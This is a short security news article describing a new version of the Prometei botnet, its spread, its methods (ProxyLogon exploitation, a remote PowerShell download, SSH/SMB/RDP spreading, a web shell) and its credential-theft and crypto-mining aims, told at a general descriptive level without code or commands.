HQ/EMEAFind out how we can help your business
Since November last year, the Prometei botnet developers have released its latest version, which infected over 10,000 systems globally. Based on reports, the current campaign does not have a specific target region, but most of its victims came from Indonesia, Turkey, and Brazil.
Researchers first spotted Promotei nearly a decade ago, a modular botnet containing numerous components and infectious methods. Some of the most well-known capabilities of Prometei is the exploitation of the ProxyLogon Microsoft Exchange server vulnerability.
Some experts claimed that the operators came from Russia since the country is yet to experience an attack from the threat group that uses the botnet.
Prometei botnet campaigns are primarily for financial purposes and cryptocurrency mining.
According to investigations, the cross-platform Prometei botnet malware operates a financially motivated campaign leveraging infected hosts to collect credentials and mine crypto.
Moreover, the new variant poses a significant threat to forensic analysis since it improved its features based on the weaknesses of its past versions. This unique and improved botnet could also access more locations within a targeted machine.
Researchers explained that the threat actors execute a PowerShell command to download the botnet malware from a remote server upon gaining an initial intrusion.
Subsequently, the botnet operators use the Prometei Botnet introductory module to recover the actual cryptocurrency mining payload and other components for the attack on the targeted system.
Several support modules within the botnet serve as spreader programs designed by the malware authors to spread the payload via Secure Shell, Server Message Block, and Remote Desktop Protocol.
Prometei botnet’s third version could also use a domain generation algorithm to construct its command-and-control server. Furthermore, it packs a self-update feature and an expanded set of commands to harvest confidential data and manipulate the host.
Finally, the malware launches an Apache web server with a PHP-based web shell that can execute Base64-encoded commands and run file uploads.
Cybersecurity experts warn everyone regarding this latest iteration of the Prometei botnet since it possesses numerous improvements and capabilities compared to its earlier versions.
